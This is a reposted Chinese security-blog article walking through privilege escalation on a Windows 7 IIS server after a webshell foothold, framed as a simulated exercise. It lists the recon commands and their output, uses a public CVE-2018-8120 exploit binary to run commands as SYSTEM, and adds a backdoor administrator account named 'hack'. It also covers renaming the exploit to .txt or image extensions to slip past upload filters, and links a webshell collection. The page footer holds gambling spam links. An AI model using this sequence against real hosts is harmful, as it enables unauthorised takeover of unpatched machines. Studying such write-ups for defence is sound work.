安基网 欢乐生肖 资讯 安全报 查看内容

Win7本地溢出exploit提权-CVE-2018-8120

2020-2-9 15:28| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 这边是模拟拿到了一个WebShell的后渗透提权操作提权过程首先是看了看一个当前用户权限:C:inetpubwwwrootbjgs_v2.1> whoamiiis apppoolbjgs_v2.1是一个IIS的普通权限C:inetpubwwwrootbjgs_v2.1> net user 的用户帐户------------------------------------------------------ ...

转载: saulGoodman

前言

这边是模拟拿到了一个WebShell的后渗透提权操作

提权过程

首先是看了看一个当前用户权限:

C:inetpubwwwrootbjgs_v2.1> whoamiiis apppoolbjgs_v2.1

是一个IIS的普通权限

C:inetpubwwwrootbjgs_v2.1> net user 的用户帐户-------------------------------------------------------------------------------Administrator            Guest                    liuwx                    命令运行完毕,但发生一个或多个错误。C:inetpubwwwrootbjgs_v2.1> net user admin admin /add发生系统错误 5。拒绝访问。C:inetpubwwwrootbjgs_v2.1>

创建用户:拒绝访问,那么权限还是比较低的!

先是上传个大马看看有没有可读可写的目录:

得到一个目录:

文件夹:C:inetpubwwwrootbjgs_v2.1 可读,可写。

先看看当前主机的信息:

C:inetpubwwwrootbjgs_v2.1> systeminfo主机名:           LIUWX-PCOS 名称:          Microsoft Windows 7 旗舰版 OS 版本:          6.1.7601 Service Pack 1 Build 7601OS 制造商:        Microsoft CorporationOS 配置:          独立工作站OS 构件类型:      Multiprocessor Free注册的所有人:     liuwx注册的组织:       产品 ID:          00426-292-0000007-85837初始安装日期:     2019/4/16, 1:03:42系统启动时间:     2019/10/7, 9:39:32系统制造商:       VMware, Inc.系统型号:         VMware Virtual Platform系统类型:         x64-based PC处理器:           安装了 2 个处理器。                  [01]: Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~3408 Mhz                  [02]: Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~3408 MhzBIOS 版本:        Phoenix Technologies LTD 6.00, 2017/5/19Windows 目录:     C:Windows系统目录:         C:Windowssystem32启动设备:         DeviceHarddiskVolume1系统区域设置:     zh-cn;中文(中国)输入法区域设置:   zh-cn;中文(中国)时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量:     3,103 MB可用的物理内存:   1,834 MB虚拟内存: 最大值: 6,205 MB虚拟内存: 可用:   4,956 MB虚拟内存: 使用中: 1,249 MB页面文件位置:     C:pagefile.sys域:               WORKGROUP登录服务器:       暂缺修补程序:         安装了 2 个修补程序。                  [01]: KB2534111                  [02]: KB976902网卡:             安装了 1 个 NIC。                  [01]: Intel(R) PRO/1000 MT Network Connection                      连接名:      本地连接                      启用 DHCP:   是                      DHCP 服务器: 192.168.1.1                      IP 地址                        [01]: 192.168.1.106                        [02]: fe80::10d5:df24:e351:af59C:inetpubwwwrootbjgs_v2.1>


关键信息有:

操作系统是Windows 7 x64补丁只打了两个:KB2534111、KB976902

那么我们就可以上传*.exe本地溢出提权!

这边是在Github上找到了一个提权exe: https://github.com/alpha1ab/CVE-2018-8120


吧exe上传到可读可写的目录:

先是使用exe看了看当前权限:

[*] 磁盘列表 [ C:D: ]C:inetpubwwwrootbjgs_v2.1> whoamiiis apppoolbjgs_v2.1C:inetpubwwwrootbjgs_v2.1> C:inetpubwwwrootbjgs_v2.1> CVE-2018-8120.exe "whoami"CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab)[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.[+] Trying to execute whoami as SYSTEM...[+] Process created with pid 3132!nt authoritysystemC:inetpubwwwrootbjgs_v2.1>


是一个:nt authoritysystem系统权限!

提权命令:(创建一个hack用户并且提升为管理员组)

CVE-2018-8120.exe "net user hack hack /add"CVE-2018-8120.exe "net localgroup administrators hack /add"


C:inetpubwwwrootbjgs_v2.1> net user 的用户帐户-------------------------------------------------------------------------------Administrator            Guest                    hack                     liuwx                    命令运行完毕,但发生一个或多个错误。C:inetpubwwwrootbjgs_v2.1> net user hack用户名                 hack全名                   注释                   用户的注释             国家/地区代码          000 (系统默认值)帐户启用               Yes帐户到期               从不上次设置密码           2019/10/7 11:04:04密码到期               2019/11/18 11:04:04密码可更改             2019/10/7 11:04:04需要密码               Yes用户可以更改密码       Yes允许的工作站           All登录脚本               用户配置文件           主目录                 上次登录               从不可允许的登录小时数     All本地组成员             *Administrators       全局组成员             *None                 命令成功完成。

提权成功!

番外篇

二进制文件后缀可任意修改

首先我们是有一个二进制文件:CVE-2018-8120.exe

接着吧exe后缀改成txt

CVE-2018-8120。txt “whoami”

C:inetpubwwwrootbjgs_v2.1> CVE-2018-8120.txt "whoami"CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab)[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.[+] Trying to execute whoami as SYSTEM...[+] Process created with pid 2700!nt authoritysystem

可以看到,是可以执行的!

一般这种用于不能上传exe、bat文件,我们就可以吧exe文件修改为可上传的后缀文件也能照常运行!

图片格式也是可以的!

aspx比asp权限大

如果网站支持aspx脚本,那么有的时候asp的权限比较小,但是上传了aspx脚本后权限就比asp要大一些!

因为aspx使用的是.net技术。IIS 中默认不支持,ASPX需要依赖于.net framework …ASP只是脚本语言而已。ASP.NET允许用户使用IIS建立网络服务。入侵的时候…asp的木马一般是guest权限…APSX的木马一般是users权限…iis6默认以network service身份运行。iis5默认是aspnet ASP.NET,IIS的权限机制非常复杂,对每一层应用,都有不同的权限控制。总之..要求对asp.net开放相应权限,才可以让你的网站完成相应的服务。ASP.net程序的访问权限由ASPNET的权限来决定。ASPNET隶属于Users组。所以ASPX权限就要高一些…

WebSHELL集合 : https://github.com/tennc/webshell



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6791279542125199884/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
内蒙古快3 飞速赛车平台 广西快3开奖 幸运飞艇官网 北京两步彩APP 欢乐生肖 上海时时乐 三分时时彩 欢乐生肖 飞速赛车平台